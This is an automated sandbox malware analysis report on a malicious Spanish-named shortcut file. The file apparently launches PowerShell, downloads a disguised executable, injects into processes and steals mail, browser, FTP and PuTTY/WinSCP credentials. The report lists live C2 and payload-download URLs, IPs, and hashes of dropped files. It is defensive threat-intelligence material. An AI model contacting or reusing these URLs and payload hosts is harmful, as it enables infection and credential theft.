                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing
                NTDS11
                Process Discovery
                Distributed Component Object ModelInput Capture215
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets41
                Virtualization/Sandbox Evasion
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                Masquerading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
                Virtualization/Sandbox Evasion
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Access Token Manipulation
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                Process Injection
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524797 Sample: Comprobante.lnk.lnk Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 36 freighteighttwocam.ddns.net 2->36 38 www.sodiumlaurethsulfatedesyroyer.com 2->38 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 52 15 other signatures 2->52 9 powershell.exe 14 28 2->9         started        signatures3 50 Uses dynamic DNS services 36->50 process4 dnsIp5 42 www.sodiumlaurethsulfatedesyroyer.com 188.114.97.3, 443, 49706 CLOUDFLARENETUS European Union 9->42 34 C:\Users\user\Desktop\screens.pif, PE32 9->34 dropped 62 Drops PE files with a suspicious file extension 9->62 64 Loading BitLocker PowerShell Module 9->64 66 Powershell drops PE file 9->66 14 screens.pif 1 9->14         started        17 conhost.exe 1 9->17         started        file6 signatures7 process8 signatures9 68 Detected unpacking (changes PE section rights) 14->68 70 Tries to steal Mail credentials (via file registry) 14->70 72 Machine Learning detection for dropped file 14->72 74 Injects a PE file into a foreign processes 14->74 19 screens.pif 104 14->19         started        24 screens.pif 14->24         started        26 screens.pif 14->26         started        process10 dnsIp11 40 freighteighttwocam.ddns.net 45.149.241.169, 49707, 49708, 49709 UUNETUS Germany 19->40 32 C:\Users\user\AppData\...\31437F.exe (copy), PE32 19->32 dropped 54 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 19->54 56 Tries to steal Mail credentials (via file / registry access) 19->56 58 Tries to harvest and steal ftp login credentials 19->58 60 Tries to harvest and steal browser information (history, passwords, etc) 19->60 28 WerFault.exe 2 24->28         started        30 WerFault.exe 2 26->30         started        file12 signatures13 process14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Comprobante.lnk.lnk42%ReversingLabsScript-PowerShell.Trojan.Jatommy
                Comprobante.lnk.lnk100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\Desktop\screens.pif100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                freighteighttwocam.ddns.net
                45.149.241.169
                truetrue
                  unknown
                  www.sodiumlaurethsulfatedesyroyer.com
                  188.114.97.3
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    http://freighteighttwocam.ddns.net/mdifygidj/five/fre.phptrue
                      unknown
                      http://kbfvzoboss.bid/alien/fre.phptrue
                        unknown
                        http://alphastand.top/alien/fre.phptrue
                          unknown
                          http://alphastand.win/alien/fre.phptrue
                            unknown
                            http://alphastand.trade/alien/fre.phptrue
                              unknown
                              https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.piftrue
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1536953245.0000027834D45000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1487508963.00000278262FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  http://www.sodiumlaurethsulfatedesyroyer.compowershell.exe, 00000000.00000002.1487508963.00000278255C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://go.micropowershell.exe, 00000000.00000002.1487508963.0000027825C2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.ibsensoftware.com/screens.pif, screens.pif, 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                      unknown
                                      https://www.sodiumlaurethsulfatedesyroyer.com/Npowershell.exe, 00000000.00000002.1487060690.0000027824BDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://www.microsoft.copowershell.exe, 00000000.00000002.1541215638.000002783CF06000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://contoso.com/Licensepowershell.exe, 00000000.00000002.1536953245.0000027834D45000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://contoso.com/Iconpowershell.exe, 00000000.00000002.1536953245.0000027834D45000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000000.00000002.1487508963.00000278262FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://www.sodiumlaurethsulfatedesyroyer.com/owpowershell.exe, 00000000.00000002.1541215638.000002783CF06000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://www.microsoft.co7powershell.exe, 00000000.00000002.1541077857.000002783CD90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://www.microsoft.powershell.exe, 00000000.00000002.1487015359.0000027824BD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://www.sodiumlaurethsulfatedesyroyer.compowershell.exe, 00000000.00000002.1487508963.00000278255BE000.00000004.00000800.00020000.00000000.sdmptrue
                                                    unknown
                                                    http://go.microspowershell.exe, 00000000.00000002.1487508963.0000027825C2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://contoso.com/powershell.exe, 00000000.00000002.1536953245.0000027834D45000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1536953245.0000027834D45000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgpowershell.exe, 00000000.00000002.1485393170.0000027822A18000.00000004.00000020.00020000.00000000.sdmp, Comprobante.lnk.lnktrue
                                                          unknown
                                                          https://aka.ms/pscore68powershell.exe, 00000000.00000002.1487508963.0000027824CD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1487508963.0000027824CD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          188.114.97.3
                                                          www.sodiumlaurethsulfatedesyroyer.comEuropean Union
                                                          13335CLOUDFLARENETUStrue
                                                          45.149.241.169
                                                          freighteighttwocam.ddns.netGermany
                                                          701UUNETUStrue
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1524797
                                                          Start date and time:2024-10-03 09:19:29 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 5m 45s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:17
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:Comprobante.lnk.lnk
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winLNK@12/12@3/2
                                                          EGA Information:
                                                          • Successful, ratio: 66.7%
                                                          HCA Information:
                                                          • Successful, ratio: 94%
                                                          • Number of executed functions: 109
                                                          • Number of non-executed functions: 35
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .lnk
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target powershell.exe, PID 7360 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: Comprobante.lnk.lnk
                                                          TimeTypeDescription
                                                          03:20:36API Interceptor42x Sleep call for process: powershell.exe modified
                                                          03:20:55API Interceptor94x Sleep call for process: screens.pif modified
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          188.114.97.3QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • filetransfer.io/data-package/758bYd86/download
                                                          QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                          • filetransfer.io/data-package/58PSl7si/download
                                                          QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                          • filetransfer.io/data-package/58PSl7si/download
                                                          payment copy.exeGet hashmaliciousFormBookBrowse
                                                          • www.cc101.pro/0r21/
                                                          BX7yRz7XqF.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                          • cloud.dellicon.top/1000/500/
                                                          jKSjtQ8W7O.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                          • ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/
                                                          Shipping Documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.rtprajalojago.live/7vun/
                                                          inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                                          • joxi.net/4Ak49WQH0GE3Nr.mp3
                                                          http://meta.case-page-appeal.eu/community-standard/208273899187123/Get hashmaliciousUnknownBrowse
                                                          • meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
                                                          9q24V7OSys.exeGet hashmaliciousFormBookBrowse
                                                          • www.kzeconomy.top/bopi/?-Z_XO=6kwaqb6m5omublBEUG6Q6qPKP5yOZjcuHwr6+9T02/Tvpmf8nJuTPpmClij6fvBBwm3b&zxltAx=RdCtqlAhlNvlRVfP
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          freighteighttwocam.ddns.netDetalles_del_albaran.exeGet hashmaliciousAsyncRATBrowse
                                                          • 94.156.102.141
                                                          www.sodiumlaurethsulfatedesyroyer.comPAGO.08.12.2024.lnk.lnkGet hashmaliciousUnknownBrowse
                                                          • 188.114.96.3
                                                          Estado de cuenta .xlsGet hashmaliciousXenoRATBrowse
                                                          • 188.114.96.3
                                                          Comprobante_Pago.08.12.2024.lnkGet hashmaliciousUnknownBrowse
                                                          • 188.114.97.3
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 104.21.16.12
                                                          DHL Receipt_AWB 9892671327.xlsGet hashmaliciousUnknownBrowse
                                                          • 172.67.216.244
                                                          Hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.97.3
                                                          hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.96.3
                                                          MVR-00876 CARRARO ITALIA SPA.xlsGet hashmaliciousUnknownBrowse
                                                          • 188.114.97.3
                                                          Payment proof.xlsGet hashmaliciousUnknownBrowse
                                                          • 104.21.78.54
                                                          5STdfnsEu5.exeGet hashmaliciousLummaCBrowse
                                                          • 104.21.16.12
                                                          MVR-00876 CARRARO ITALIA SPA.xlsGet hashmaliciousUnknownBrowse
                                                          • 188.114.97.3
                                                          QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 188.114.97.3
                                                          Payment proof.xlsGet hashmaliciousUnknownBrowse
                                                          • 104.21.78.54
                                                          UUNETUSyakov.arm.elfGet hashmaliciousMiraiBrowse
                                                          • 71.249.27.4
                                                          yakov.m68k.elfGet hashmaliciousMiraiBrowse
                                                          • 71.168.245.89
                                                          yakov.arm7.elfGet hashmaliciousMiraiBrowse
                                                          • 173.77.39.174
                                                          yakov.mpsl.elfGet hashmaliciousMiraiBrowse
                                                          • 139.4.200.165
                                                          novo.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 63.78.130.243
                                                          novo.arm64.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 141.155.190.165
                                                          novo.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 65.192.241.92
                                                          novo.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 208.210.106.232
                                                          novo.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 64.36.13.201
                                                          novo.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 149.230.228.170
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          3b5074b1b5d032e5620f69f9f700ff0eHesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.97.3
                                                          hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.97.3
                                                          QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 188.114.97.3
                                                          sostener.vbsGet hashmaliciousNjratBrowse
                                                          • 188.114.97.3
                                                          sostener.vbsGet hashmaliciousXWormBrowse
                                                          • 188.114.97.3
                                                          file.exeGet hashmaliciousUnknownBrowse
                                                          • 188.114.97.3
                                                          file.exeGet hashmaliciousUnknownBrowse
                                                          • 188.114.97.3
                                                          T3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          • 188.114.97.3
                                                          file.exeGet hashmaliciousUnknownBrowse
                                                          • 188.114.97.3
                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, StealcBrowse
                                                          • 188.114.97.3
                                                          No context
                                                          Process:C:\Users\user\Desktop\screens.pif
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):706
                                                          Entropy (8bit):5.349842958726647
                                                          Encrypted:false
                                                          SSDEEP:12:Q3La/hz92n4M0kvoDLI4MWuCqDLI4MWuPTAq1KDLI4M9XKbbDLI4MWuPJKAVKhav:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhk
                                                          MD5:873FA73F7EAAC5A90DC38988855C5032
                                                          SHA1:694CDB950E35FE9EDBAE22377CBB1630F8F1DB84
                                                          SHA-256:501001FA544E6D1C28EE3BAAAB9CC953E4421AD91222FF68C44CB5BC015D6E02
                                                          SHA-512:3DE429FD9A218A6B491E0D9346A31E9B0418331649452B0AA161452DE6D2DA535AAA3E0FE18FE73B0A7AF77DE7C43DAD77E2C72ADFAC153A1E5EB279FAEB32B0
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1940658735648508
                                                          Encrypted:false
                                                          SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                                                          MD5:DA1F22117B9766A1F0220503765A5BA5
                                                          SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                                                          SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                                                          SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:@...e.................................R..............@..........
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Users\user\Desktop\screens.pif
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):371712
                                                          Entropy (8bit):7.854168969155107
                                                          Encrypted:false
                                                          SSDEEP:6144:Mt0VqnKoq12xV+0+LGQ3orU7K9ORPCfQzyI4w2Q8y7tRQG9oeGdwpx6sqyqqQlh4:MIqnJV+3GTQVzZ+MXf6Ex6sqyqqQlhcl
                                                          MD5:DB94D5DF4ADD0A06F261EAE73C2DA5DB
                                                          SHA1:A37FFECD4004127C3EE2E4ED8F2E5D507C418DC1
                                                          SHA-256:8CF4CC35E623A326F1B5FE4892F5D5E44272925F33B7439E675EDFC81BA2AF70
                                                          SHA-512:8FC3F52D241CD06DB33BCC6FB85564A4FD3EE171E154162B2FB5B1C8E63216CD0F470EBE9DDC1D5E093B4713E1E93DF33D696EED0258D89E3A33B68D47B3CC67
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...QA.f............................. ... ... ....@.. .......................@............`.................................$'..W.......8............................................................................ ............... ..H...........j1CM!e^U..... ......................@....text....... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B............. ...................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\screens.pif
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Preview:1
                                                          Process:C:\Users\user\Desktop\screens.pif
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):45
                                                          Entropy (8bit):0.9111711733157262
                                                          Encrypted:false
                                                          SSDEEP:3:/lwltAOl:WKK
                                                          MD5:1249116D570D2994CF7B4CD674646796
                                                          SHA1:13E7AF8AC4636DBAED0C23C14B17ACEA00F87214
                                                          SHA-256:487DC40611285BD6566DD58CD32B8FFF1C56CCB9924EC2DCB74C76F421C8F9AD
                                                          SHA-512:849529569C30BDAE95C6B2609A75E9B7C263E370BFB03680BF648FCE4CF9FEF9AB4AB25C4738CCC3642727B18DB68E94D97CB0D0D833E19795076FB7FDB5269B
                                                          Malicious:false
                                                          Preview:........................................user.
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5352
                                                          Entropy (8bit):3.401689128097729
                                                          Encrypted:false
                                                          SSDEEP:48:gHjccAKmoYDgAnUFOrQlL1SogZokBasgnUFOrQlG1SogZokBaI1:gHn2jpU4cCHHBaZU4cVHHBaa
                                                          MD5:81EC8C223BB588AD8DAF4BC867DCC0B5
                                                          SHA1:F6E4A6D8F2E58DCB4EAEC10DA7014B0E974317FF
                                                          SHA-256:E1317E52F65039D0FE96A919B3E89FF8CF47F418089649C52E798D9B309E34B6
                                                          SHA-512:57EABC8EA4F78389611976DB2B7B16AC76A95337F6749D089E0A671AA152F6DAFFAA89763BE6876381E2BBEA60E853863F1D6F527E25EF7ED703BBCD1C702156
                                                          Malicious:false
                                                          Preview:...................................FL..................F.`.. ..._:&!w......d.....).d................................P.O. .:i.....+00.:...:..,.LB.)...A&...&......i..5q......&w......d.....t.2.....CY.: .COMPRO~1.LNK..X......EW.SCY.:....:..... ...............c.G.C.o.m.p.r.o.b.a.n.t.e...l.n.k...l.n.k.......X...............-.......W.............$`.....C:\Users\user\Desktop\Comprobante.lnk.lnk.. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.d.d.i.s.p.l.a.y...d.l.l.........%SystemRoot%\system32\ddisplay.dll..................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.d.d.i.s.p.l.a.y...d.l.l.........................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5352
                                                          Entropy (8bit):3.401689128097729
                                                          Encrypted:false
                                                          SSDEEP:48:gHjccAKmoYDgAnUFOrQlL1SogZokBasgnUFOrQlG1SogZokBaI1:gHn2jpU4cCHHBaZU4cVHHBaa
                                                          MD5:81EC8C223BB588AD8DAF4BC867DCC0B5
                                                          SHA1:F6E4A6D8F2E58DCB4EAEC10DA7014B0E974317FF
                                                          SHA-256:E1317E52F65039D0FE96A919B3E89FF8CF47F418089649C52E798D9B309E34B6
                                                          SHA-512:57EABC8EA4F78389611976DB2B7B16AC76A95337F6749D089E0A671AA152F6DAFFAA89763BE6876381E2BBEA60E853863F1D6F527E25EF7ED703BBCD1C702156
                                                          Malicious:false
